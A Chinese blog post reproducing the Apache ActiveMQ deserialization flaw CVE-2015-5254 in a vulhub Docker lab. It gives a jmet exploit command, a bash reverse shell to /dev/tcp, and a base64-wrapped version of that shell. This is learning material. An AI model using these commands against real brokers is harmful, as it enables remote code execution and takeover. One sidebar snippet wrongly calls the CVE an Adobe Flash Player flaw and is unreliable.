CVE-2015-5254

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量61 收藏
点赞数
文章标签: 安全 服务器 apache Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45014174/article/details/129279812
版权

1、开启docker服务

systemctl start docker.service

2、切换目录

cd vulhub/activemq/CVE-2015-5254

3、启动环境

docker-compose up

4、查看docker服务允许在那个端口下

5、通过未授权访问(admin/admin),在客户机上打开浏览器输入本机ip+docker后台管理系统的端口好(8161)

192.168.99.25:8161(不用打开Apache服务)

6、创建success

这里我们要用到JAVA的中间件(imet-0.1.0-all.gar)

链接:https://pan.baidu.com/s/1woqq5b26mblH8UXCqXHmUA

提取码:lj0i

在你放置JAVA中间件的地方输入 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.99.25 61616

7、访问消息页面(用户和密码默认都是admin)

http://192.168.99.25:8161/admin/queues.jsp

10、点击消息触发时事件

11、查看是否创建成功

12、反弹shell

bash -i >& /dev/tcp/ip/1000 0>&1

13、shell进行base64编码

https://www.jackson-t.ca/runtime-exec-payloads.html

bash -c {echo,编码内容}|{base64,-d}|{bash,-i}

14、反弹shell

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "编码shell" -Yp ROME 192.168.99.25 61616

|Print_r("‮("
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ActiveMQ CVE-2015-5254 分析
示例和笔记
06-07 270
ActiveMQ CVE-2015-5254 该漏洞是由于缺少对序列化数据的校验而导致,攻击者可以在序列化的数据中注入恶意代码。当 ActiveMQ 接收到该序列化数据并尝试反序列化时,将会执行这段恶意代码,从而实现攻击目的。具体来说,该漏洞的发生是由于 ActiveMQ 的两个缺陷导致。首先是方法中的缺陷,该方法将异常对象序列化为字节数组,这个字节数组包含了cause内的异常和message内的信息。攻击者可以构造精心设计的cause和message来注入恶意代码。接着,ActiveMQ 的与。
01 - vulhub - ActiveMq - CVE-2015-5254
易编橙 · 终身成长社群,相遇已是上上签!
09-18 610
该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行恶意的代码。
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
m0_74402888的博客
04-30 1138
1.在IDEA中建立好了SpringBoot项目,并配置好了docker容器,然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。其中61616端口是工作端口,消息在这个端口上传递;
vulhub中activemq的CVE-2015-5254漏洞复现
yougexiaojiuguan的博客
11-24 461
学习过程中复现的漏洞,方便自己以后查看
ActiveMQ 反序列化漏洞(CVE-2015-5254)特征分析
xhscxj的博客
11-24 901
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
vulhub-activemq-CVE-2015-5254
weixin_43585088的博客
04-17 486
vulhub-activemq-CVE-2015-5254 ActiveMQ Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件 默认端口:8161 vulhub起容器 搭建的时候出了点问题,查了一下可能是net模式的dns有问题,sudo vim /etc/resolv.conf 去添加一些nameserver ERROR: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.docker.i
【vulhub漏洞复现】CVE-2015-5254 ActiveMQ反序列化漏洞
RexHa的博客
02-26 1809
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
ActiveMQ 反序列化漏洞(CVE-2015-5254)
weixin_44047654的博客
11-23 464
ActiveMQ 反序列化漏洞(CVE-2015-5254)
CVE-2015-5254漏洞复现
2201_75761617的博客
08-19 249
Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务,集群,Spring Framework 等。值得注意的是,通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。至此,一个权限为root,密码为123456的用户被我们创建成功,之后可以直接进行ssh远程连接。(1)访问web界面并进行登录。
ActiveMQ 反序列化漏洞(CVE-2015-5254
The code way of kinnisoy
10-24 1968
ActiveMQ 反序列化漏洞(CVE-2015-5254
ActiveMQ 反序列化漏洞(CVE-2015-5254)利用工具
08-15
ActiveMQ 反序列化漏洞(CVE-2015-5254)利用工具,ActiveMQ,漏洞,反序列化漏洞,CVE-2015-5254,利用工具,工具
FREAK-Attack-CVE-2015-0204-Testing-Script:根据 Akamai 的建议,针对 FREAK 攻击 (CVE-2015-0204) 自动执行基于 OpenSSL 的测试的基本 BASH 脚本
06-20
根据 Akamai 的建议,针对 FREAK 攻击 (CVE-2015-0204) 自动执行基于 OpenSSL 的测试的基本 BASH 脚本。 它是一个免费软件,不需要别人的服务器来运行。 您的服务器在正常情况下必须通过 SSL Labs 测试获得 A+ 的...
CVE-2015-5119_walkthrough:文章CVE-2015-5119 Flash ByteArray UaF的存档
05-10
CVE-2015-5119_walkthrough
cve-2015-5477:CVE-2015-5477 BIND9 TKEY断言失败的PoC攻击
05-18
BOND9 TKEY断言DoS的PoC(CVE-2015-5477) 该漏洞利用程序通过发送漏洞利用程序进行测试,以查看BIND9服务器是否易受攻击,以查看其是否崩溃。 您是在Unix / Window上以常规方式编译的C代码,例如: # gcc tkill.c -...
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835
06-20
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011...
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 204
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 941
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
安全漏洞扫描工具
weixin_45639224的博客
06-05 627
安全漏洞扫描工具
操作系统安全:Windows系统安全配置,Windows安全基线检查加固
wangyuxiang946的博客
06-11 1291
Windows安全基线检查标准,Windows加固方式
cve-2015-5254
12-17
CVE-2015-5254是关于Adobe Flash Player的一个已知漏洞。该漏洞可能允许远程攻击者执行任意代码,导致系统崩溃或接管受影响的计算机。这可能会对个人用户和组织的网络安全构成严重威胁。 该漏洞是在2015年发现的,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值